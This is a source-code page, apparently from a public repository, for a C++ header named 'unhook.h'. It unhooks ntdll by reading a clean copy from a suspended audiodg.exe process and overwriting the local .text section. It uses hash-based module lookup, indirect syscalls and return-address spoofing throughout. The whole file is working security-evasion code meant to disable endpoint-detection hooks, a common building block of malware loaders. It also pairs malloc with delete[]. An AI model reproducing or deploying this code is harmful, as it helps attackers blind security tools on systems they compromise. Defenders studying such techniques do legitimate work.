-
Notifications
You must be signed in to change notification settings - Fork 52
/
unhook.h
139 lines (90 loc) · 4.3 KB
/
unhook.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
// This header file uses indirect syscalls to unhook ntdll from a suspended process
#pragma once
#include "functions.h"
#include "resolvers.h"
#include "ntprocessapi.h"
#include "retaddrspoof.h"
extern PVOID Gdgt;
DWORD GetImageSizeFromBase() {
HMODULE BASE = GetLoadedDllHandleH(776560387); // Getting NTDLL BASE By Hash
uintptr_t base = reinterpret_cast<uintptr_t>(BASE);
PIMAGE_DOS_HEADER pdos = (PIMAGE_DOS_HEADER)base;
if (pdos->e_magic != IMAGE_DOS_SIGNATURE) {
std::cout << "IMAGE_DOS_SIGNATURE MISMATCH\n";
return NULL;
}
PIMAGE_NT_HEADERS pntheaders = (PIMAGE_NT_HEADERS)(pdos->e_lfanew + base); // getting the nt headers using its rva
if (pntheaders->Signature != IMAGE_NT_SIGNATURE) {
std::cout << "IMAGE_NT_SIGNATURE MISMATCH\n";
return NULL;
}
return pntheaders->OptionalHeader.SizeOfImage;
}
VOID ReadBufferFromProcess(OUT PBYTE* BUFFER) {
DWORD sizeofheap = GetImageSizeFromBase();
HMODULE BASE = GetLoadedDllHandleH(776560387);
// Temporarily Create a process
HANDLE hProcess = nullptr;
HANDLE hThread = nullptr;
NTSTATUS status = NtCreateUserSuspendedProcess(L"\\??\\C:\\Windows\\System32\\audiodg.exe", &hProcess, &hThread);
if (status != ERROR_SUCCESS || hProcess == NULL || hProcess == INVALID_HANDLE_VALUE || hThread == NULL || hThread == INVALID_HANDLE_VALUE) { // gotta be sure tho xD
std::cout << "Process Creation Error: " << std::hex << status << "\n";
}
PBYTE bufferMemory = (PBYTE)malloc((SIZE_T)sizeofheap);
RtlSecureZeroMemory(bufferMemory, sizeofheap);
SIZE_T lpNumberOfBytesRead = 0;
status = (NTSTATUS)RetSpoofCall(SysNtReadVirtualMemory, 5, Gdgt, hProcess, BASE, bufferMemory, sizeofheap, &lpNumberOfBytesRead);
if (status != ERROR_SUCCESS) {
std::cout << "Read Error: " << std::hex << status << "\n";
}
*BUFFER = bufferMemory;
//free(bufferMemory);
// status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)SysNtTerminateProcess, 2, Gdgt, hProcess, 0));
status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)SysNtTerminateProcess, 2, Gdgt, hProcess, 0));
if (status != ERROR_SUCCESS) {
std::cout << "Termination Error: " << std::hex << status << "\n";
}
}
/// <summary>
/// Perfomes NTDLL unhooking from a suspended process using return address spoofing and indirect syscalls
/// </summary>
/// <returns></returns>
VOID FlushNTDLL() {
PVOID LOCAL_SECTION = NULL,
REMOTE_SECTION = NULL;
SIZE_T SECTION_SIZE;
PBYTE clean_buffer = nullptr;
ReadBufferFromProcess(&clean_buffer);
HMODULE BASE = GetLoadedDllHandleH(776560387);
uintptr_t base = reinterpret_cast<uintptr_t>(BASE);
PIMAGE_DOS_HEADER pdos = (PIMAGE_DOS_HEADER)base;
if (pdos->e_magic != IMAGE_DOS_SIGNATURE) {
std::cout << "IMAGE_DOS_SIGNATURE MISMATCH\n";
return;
}
PIMAGE_NT_HEADERS pntheaders = (PIMAGE_NT_HEADERS)(pdos->e_lfanew + base); // getting the nt headers using its rva
if (pntheaders->Signature != IMAGE_NT_SIGNATURE) {
std::cout << "IMAGE_NT_SIGNATURE MISMATCH\n";
return;
}
PIMAGE_SECTION_HEADER SECTIONS_ENTRY = IMAGE_FIRST_SECTION(pntheaders);
for (int i = 0; i < pntheaders->FileHeader.NumberOfSections; i++) {
//std::cout << (CHAR*)SECTIONS_ENTRY[i].Name << std::endl;
if (strcmp((CHAR*)SECTIONS_ENTRY[i].Name, ".text") == 0) {
LOCAL_SECTION = (PVOID)(base + SECTIONS_ENTRY[i].VirtualAddress);
REMOTE_SECTION = (PVOID)(clean_buffer + SECTIONS_ENTRY[i].VirtualAddress);
SECTION_SIZE = SECTIONS_ENTRY[i].Misc.VirtualSize;
}
}
DWORD old_protect;
NTSTATUS status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)SysNtProtectVirtualMemory, 5, Gdgt, SELF_HANDLE, &LOCAL_SECTION, &SECTION_SIZE, PAGE_EXECUTE_WRITECOPY, &old_protect));
if (status != ERROR_SUCCESS) { std::cout << "Protection 1 Error: " << std::hex << status << "\n"; return; }
RetSpoofCall((void*)memcpy, 3, Gdgt ,LOCAL_SECTION, REMOTE_SECTION, (SIZE_T)SECTION_SIZE);
status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)SysNtProtectVirtualMemory, 5, Gdgt, SELF_HANDLE, &LOCAL_SECTION, &SECTION_SIZE, old_protect, &old_protect));
if (status != ERROR_SUCCESS) { std::cout << "Protection 2 Error: " << std::hex << status << "\n"; return; }
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] UNHOOKED NTDLL!\n";
#endif
delete[] clean_buffer;
return;
}